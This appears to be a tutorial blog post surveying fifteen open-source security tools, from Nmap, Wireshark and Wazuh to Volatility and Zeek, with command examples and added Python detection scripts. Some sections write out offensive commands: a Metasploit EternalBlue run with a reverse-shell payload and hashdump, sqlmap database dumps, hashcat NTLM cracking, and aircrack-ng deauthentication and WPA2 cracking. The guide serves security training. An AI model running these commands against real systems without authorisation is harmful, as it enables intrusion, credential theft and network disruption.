Why Open-Source Security Tools Matter
Open-source cybersecurity tools power some of the world’s most sophisticated security operations centers. They’re free, community-vetted, constantly updated, and often more capable than paid alternatives. Whether you’re a solo analyst, a startup SOC, or a Fortune 500 team, these tools belong in your arsenal.
1. Nmap — Network Discovery & Port Scanning
Nmap is the gold standard for network reconnaissance. It discovers hosts, open ports, running services, and operating system fingerprints.
# Install on Ubuntu/Debian
sudo apt install nmap
# Basic host discovery across subnet
nmap -sn 192.168.1.0/24
# Aggressive scan: OS, version, scripts, traceroute
nmap -A -T4 192.168.1.100
# Scan for known vulnerabilities
nmap --script vuln 192.168.1.100
# Stealth SYN scan (requires root)
sudo nmap -sS -p 1-65535 192.168.1.100
# Save results to XML
nmap -oX scan_results.xml 192.168.1.0/24

Real use case: A SOC analyst runs Nmap on a newly acquired company’s network before a formal pentest. They discover 47 RDP ports (3389) open externally — a critical finding the IT team had no record of.
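As an added example (not code from the original post), this Python script parses the XML that nmap -oX writes and lists the hosts exposing a given port, which is the check behind the RDP finding in the use case above; the XML here is a constructed two-host sample, not a real scan.

```python
import xml.etree.ElementTree as ET

# Constructed sample in nmap -oX layout (two hosts); not output from a real scan.
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="203.0.113.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
    </ports></host>
  <host><status state="up"/><address addr="203.0.113.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    </ports></host>
</nmaprun>"""


def open_ports(xml_text):
    """Return {ip: {(proto, port, service), ...}} for every port nmap reports as open."""
    result = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ports = set()
        for p in host.iter("port"):
            state = p.find("state")
            if state is not None and state.get("state") == "open":  # filtered/closed are skipped
                svc = p.find("service")
                name = svc.get("name") if svc is not None else ""
                ports.add((p.get("protocol"), int(p.get("portid")), name))
        result[addr.get("addr")] = ports
    return result


def hosts_exposing(xml_text, port, proto="tcp"):
    """Sorted IPs with the given port open, e.g. RDP (3389/tcp) reachable from the scanner."""
    return sorted(ip for ip, ports in open_ports(xml_text).items()
                  if any(pr == proto and pt == port for pr, pt, _ in ports))


if __name__ == "__main__":
    rdp = hosts_exposing(SAMPLE_XML, 3389)
    print(f"{len(rdp)} host(s) with RDP open: {rdp}")
```

Run it against a real file with `hosts_exposing(open("scan_results.xml").read(), 3389)`.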
2. Wireshark — Packet Capture & Analysis
Wireshark captures and dissects network traffic in real time. It’s essential for incident response, malware analysis, and troubleshooting.
# Capture on eth0 interface, save to file
sudo tshark -i eth0 -w capture.pcap
# Display only HTTP traffic
tshark -r capture.pcap -Y "http"
# Find DNS queries (detect DNS tunneling)
tshark -r capture.pcap -Y "dns" -T fields -e dns.qry.name
# Detect ARP spoofing
tshark -r capture.pcap -Y "arp.duplicate-address-detected"
# Extract HTTP transferred files
tshark -r capture.pcap --export-objects http,./extracted/

Key display filters: ip.addr == 10.0.0.5 filters a specific host; http.request.method == "POST" shows form and credential submissions; tcp.flags.syn == 1 && tcp.flags.ack == 0 shows SYN scans.
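An added example, not from the original post, that applies the SYN-scan filter logic (tcp.flags.syn == 1 && tcp.flags.ack == 0) outside Wireshark: it parses raw IPv4/TCP headers from constructed packets and flags sources that send SYN-only probes to many distinct ports; min_ports is an assumed threshold.

```python
import struct
from collections import defaultdict

SYN, ACK = 0x02, 0x10  # TCP flag bits


def build_ipv4_tcp(src, dst, sport, dport, flags):
    """Build a minimal IPv4+TCP packet (constructed test input; checksums left zero)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                         bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    return ip_hdr + tcp_hdr


def parse_ipv4_tcp(pkt):
    """Return (src, dst, dport, flags) or None if the bytes are not TCP over IPv4."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6 or len(pkt) < ihl + 20:  # IP protocol 6 = TCP
        return None
    src = ".".join(map(str, pkt[12:16]))
    dst = ".".join(map(str, pkt[16:20]))
    dport = struct.unpack("!H", pkt[ihl + 2:ihl + 4])[0]
    flags = pkt[ihl + 13]
    return src, dst, dport, flags


def syn_scanners(packets, min_ports=10):
    """Same test as the display filter: SYN set, ACK clear; count distinct (dst, port) per source."""
    targets = defaultdict(set)
    for pkt in packets:
        parsed = parse_ipv4_tcp(pkt)
        if parsed and parsed[3] & SYN and not parsed[3] & ACK:
            targets[parsed[0]].add((parsed[1], parsed[2]))
    return {src: len(t) for src, t in targets.items() if len(t) >= min_ports}


# Constructed traffic: one host probes 25 ports, another completes a single normal handshake.
PACKETS = [build_ipv4_tcp("10.0.0.99", "10.0.0.5", 40000 + i, 1 + i, SYN) for i in range(25)]
PACKETS += [build_ipv4_tcp("10.0.0.7", "10.0.0.5", 51000, 443, SYN),
            build_ipv4_tcp("10.0.0.5", "10.0.0.7", 443, 51000, SYN | ACK),
            build_ipv4_tcp("10.0.0.7", "10.0.0.5", 51000, 443, ACK)]

if __name__ == "__main__":
    print(syn_scanners(PACKETS))  # only 10.0.0.99 crosses the threshold
```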
3. Metasploit Framework — Penetration Testing
Metasploit is the world’s most widely used penetration testing framework. It contains thousands of exploits, payloads, encoders, and post-exploitation modules.
# Start Metasploit
msfconsole
# Search for exploits
msf6 > search type:exploit platform:windows smb
msf6 > search eternalblue
# Use EternalBlue (MS17-010)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.100
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > run
# Post-exploitation
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump
meterpreter > run post/multi/recon/local_exploit_suggester

4. Snort — Network Intrusion Detection
# Run Snort in IDS mode
sudo snort -i eth0 -c /etc/snort/snort.conf -A console
# Custom rule (add to /etc/snort/rules/local.rules): detect ICMP echo requests (ping)
alert icmp any any -> $HOME_NET any (msg:"ICMP Ping"; itype:8; sid:1000001; rev:1;)
# Detect SQL injection attempt in client requests to web servers
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQLi UNION SELECT"; flow:to_server,established; content:"UNION SELECT"; nocase; sid:1000002; rev:1;)

5. Wazuh — Open-Source SIEM & XDR
Wazuh combines log analysis, file integrity monitoring, vulnerability detection, and active response into one platform — completely free and open-source.
# Quick deploy with Docker
git clone https://github.com/wazuh/wazuh-docker.git -b v4.7.0
cd wazuh-docker/single-node
docker-compose -f generate-indexer-certs.yml run --rm generator
docker-compose up -d
# Install agent on Linux (Debian/Ubuntu): add the Wazuh signing key and apt repository first
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | sudo gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && sudo chmod 644 /usr/share/keyrings/wazuh.gpg
echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/4.x/apt/ stable main" | sudo tee /etc/apt/sources.list.d/wazuh.list
sudo apt update
# WAZUH_IP is a placeholder for the manager's address
sudo WAZUH_MANAGER='WAZUH_IP' apt install wazuh-agent
sudo systemctl daemon-reload && sudo systemctl enable --now wazuh-agent
# Monitor real-time alerts
tail -f /var/ossec/logs/alerts/alerts.log

6. Volatility 3 — Memory Forensics
Volatility analyzes RAM memory dumps to uncover malware hiding in memory — rootkits, injected code, encryption keys, and evidence invisible on disk.
# Install (the pip package provides the `vol` command; `vol.py` is the name when run from a git checkout)
pip3 install volatility3
# Identify OS of memory dump
vol -f memory.dmp windows.info
# List running processes
vol -f memory.dmp windows.pslist
# Detect process injection / hollowing
vol -f memory.dmp windows.malfind
# Show active network connections at capture time
vol -f memory.dmp windows.netstat
# Dump a suspicious process's executable to disk (-o sets the output directory)
vol -o ./dumps/ -f memory.dmp windows.pslist --pid 1234 --dump
# Check persistence keys
vol -f memory.dmp windows.registry.printkey --key "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

7. TheHive — Incident Response Platform
TheHive lets SOC teams create, manage, and collaborate on security incidents and investigations. It integrates natively with MISP and Cortex for threat intel enrichment.
# Create alert via TheHive API v1 (YOUR_KEY is a placeholder; type, source, sourceRef, title and description are required)
curl -X POST http://localhost:9000/api/v1/alert -H "Authorization: Bearer YOUR_KEY" -H "Content-Type: application/json" -d '{
  "type": "phishing",
  "source": "mail-gateway",
  "sourceRef": "phish-0001",
  "title": "Credential phishing targeting finance team",
  "description": "Finance users received an email linking to a credential-harvesting page",
  "severity": 2,
  "tags": ["phishing","finance","malware"]
}'

8. MISP — Threat Intelligence Sharing
MISP stores and shares Indicators of Compromise (IoCs): malicious IPs, domains, file hashes, and attack patterns. Used by national CERTs and thousands of organizations worldwide.
# Add an IoC via MISP API (YOUR_API_KEY and EVENT_ID are placeholders)
curl -H "Authorization: YOUR_API_KEY" -H "Accept: application/json" -H "Content-Type: application/json" -X POST https://your-misp.local/attributes/add/EVENT_ID -d '{"type":"ip-dst","value":"185.220.101.45","to_ids":true}'
# Search for an IP
curl -H "Authorization: YOUR_API_KEY" -H "Accept: application/json" https://your-misp.local/attributes/restSearch/value:185.220.101.45

9. OpenVAS / Greenbone — Vulnerability Scanner
# Quick start with Docker (the web UI is mapped to host port 443, so browse to https://localhost)
docker run -d -p 443:9392 -e PASSWORD="admin123" --name openvas mikesplain/openvas
# Or native install
sudo apt install gvm
sudo gvm-setup && sudo gvm-start
# Native install: access at https://localhost:9392

10. Zeek — Network Traffic Analysis
Zeek passively monitors networks and generates rich structured logs — connection, DNS, HTTP, SSL, and files logs — perfect for threat hunting and forensic investigation.
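As an added example (not code from the original post or from the Zeek project), the Python below parses a constructed conn.log excerpt using its #fields header and applies the two hunts that the zeek-cut pipelines further down perform, large outbound byte counts and long-lived connections, restricted to destinations outside an assumed HOME_NETS range so that internal traffic does not drown out the results.

```python
import ipaddress

# Constructed Zeek conn.log excerpt (tab-separated, '-' means unset); not real traffic.
CONN_LOG = """#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\tconn_state
#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tinterval\tcount\tcount\tstring
1700000000.1\tC1\t10.0.0.5\t51000\t203.0.113.9\t443\ttcp\tssl\t5400.2\t734003200\t10240\tSF
1700000001.2\tC2\t10.0.0.6\t51001\t10.0.0.20\t445\ttcp\t-\t7200.0\t52428800\t1024\tSF
1700000002.3\tC3\t10.0.0.7\t51002\t198.51.100.4\t8443\ttcp\t-\t3900.5\t1200\t900\tSF
1700000003.4\tC4\t10.0.0.8\t51003\t198.51.100.5\t80\ttcp\thttp\t0.4\t-\t512\tS0
"""

# Assumed local address space (Zeek's Site::local_nets equivalent); adjust to your network.
HOME_NETS = [ipaddress.ip_network("10.0.0.0/8")]


def parse_conn_log(text):
    """Yield one dict per record using the #fields header; '-' (unset) becomes None."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            vals = [None if v == "-" else v for v in line.split("\t")]
            yield dict(zip(fields, vals))


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in HOME_NETS)


def top_uploads(rows, n=20):
    """Like zeek-cut ... | sort -k3 -rn | head, but only for external destinations."""
    ext = [r for r in rows if r["orig_bytes"] and is_external(r["id.resp_h"])]
    ext.sort(key=lambda r: int(r["orig_bytes"]), reverse=True)
    return [(r["id.orig_h"], r["id.resp_h"], int(r["orig_bytes"])) for r in ext[:n]]


def long_external(rows, min_seconds=3600):
    """Connections to external hosts lasting longer than min_seconds (awk '$3 > 3600' equivalent)."""
    return [(r["id.orig_h"], r["id.resp_h"], float(r["duration"])) for r in rows
            if r["duration"] and float(r["duration"]) > min_seconds and is_external(r["id.resp_h"])]


ROWS = list(parse_conn_log(CONN_LOG))  # materialise once so both hunts can reuse it

if __name__ == "__main__":
    print(top_uploads(ROWS))
    print(long_external(ROWS))
```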
# Analyze a PCAP
zeek -r capture.pcap
# Find large data transfers (data exfiltration indicator)
cat conn.log | zeek-cut id.orig_h id.resp_h orig_bytes | sort -k3 -rn | head -20
# Find connections to external IPs with long duration (C2 beaconing)
cat conn.log | zeek-cut id.orig_h id.resp_h duration | awk '$3 > 3600'

11. Burp Suite Community — Web App Security
# SQLMAP - automated SQL injection testing
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D dbname --tables
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump
# Nikto - web server vulnerability scanner
nikto -h http://target.com
# gobuster - directory/file brute forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

12. Hashcat — GPU Password Cracking
# Crack NTLM hashes (Windows passwords)
hashcat -m 1000 ntlm_hashes.txt rockyou.txt
# Crack MD5
hashcat -m 0 md5_hashes.txt rockyou.txt
# Use rules for mangling (adds numbers, special chars)
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Mask attack (brute force pattern)
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?d?d?d?d

13. Aircrack-ng — Wireless Security
# Put interface in monitor mode
sudo airmon-ng start wlan0
# Capture handshakes
sudo airodump-ng wlan0mon
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack to force handshake
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA2 password
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

14. Fail2ban — Automated Intrusion Prevention
sudo apt install fail2ban
# Configure /etc/fail2ban/jail.local
[sshd]
enabled = true
port = ssh
maxretry = 5
bantime = 3600
findtime = 600
# Check banned IPs
sudo fail2ban-client status sshd
# Manually ban/unban
sudo fail2ban-client set sshd banip 192.168.1.100
sudo fail2ban-client set sshd unbanip 192.168.1.100

15. Lynis — Linux Security Auditing
# Install and run full audit
sudo apt install lynis
sudo lynis audit system
# Key sections to check in report:
# - Authentication
# - File permissions
# - Kernel parameters
# - Software updates
# - Firewall status
# View warnings and suggestions from the report (-E enables the | alternation)
grep -E "warning|suggestion" /var/log/lynis-report.dat

Building Your Free Home Lab
You don’t need expensive hardware. A laptop with 16GB RAM running VirtualBox can host Kali Linux (attacker), Metasploitable 3 (target), and Wazuh (SIEM) simultaneously. Practice legally on TryHackMe, HackTheBox, and VulnHub — all offer free tiers with guided exercises perfect for beginners.